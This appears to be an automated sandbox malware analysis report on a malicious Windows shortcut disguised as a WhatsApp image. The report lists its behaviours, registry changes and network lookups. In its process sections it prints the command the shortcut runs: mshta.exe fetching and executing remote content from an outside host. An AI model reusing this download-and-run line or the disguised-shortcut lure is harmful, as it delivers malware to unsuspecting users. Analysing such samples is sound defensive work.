Analysis Overview
SHA256
683c61f8dda90ea3b1e76f2ff5ad78dc03ebe3827d56536988a9c5e4490eabd2
Threat Level: Known bad
The file WhatsApp_Image_2024-05-06.lnk was found to be: Known bad.
Malicious Activity Summary
Checks computer location settings
Enumerates physical storage devices
Modifies Internet Explorer settings
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-13 03:21
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-13 03:21
Reported
2024-06-13 03:24
Platform
win7-20240508-en
Max time kernel
121s
Max time network
121s
Command Line
Signatures
Enumerates physical storage devices
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key created | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\System32\mshta.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| PID 2156 wrote to memory of 2644 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\mshta.exe |
| PID 2156 wrote to memory of 2644 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\mshta.exe |
| PID 2156 wrote to memory of 2644 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\mshta.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\WhatsApp_Image_2024-05-06.lnk
C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" "https://dipl.site/Content/2022-23/01/03/" & mshta.exe
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| US | 8.8.8.8:53 | dipl.site | udp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-13 03:21
Reported
2024-06-13 03:24
Platform
win10v2004-20240508-en
Max time kernel
146s
Max time network
152s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key value queried | \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\cmd.exe | N/A |
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| PID 4988 wrote to memory of 2976 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\mshta.exe |
| PID 4988 wrote to memory of 2976 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\mshta.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\WhatsApp_Image_2024-05-06.lnk
C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" "https://dipl.site/Content/2022-23/01/03/" & mshta.exe
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | dipl.site | udp |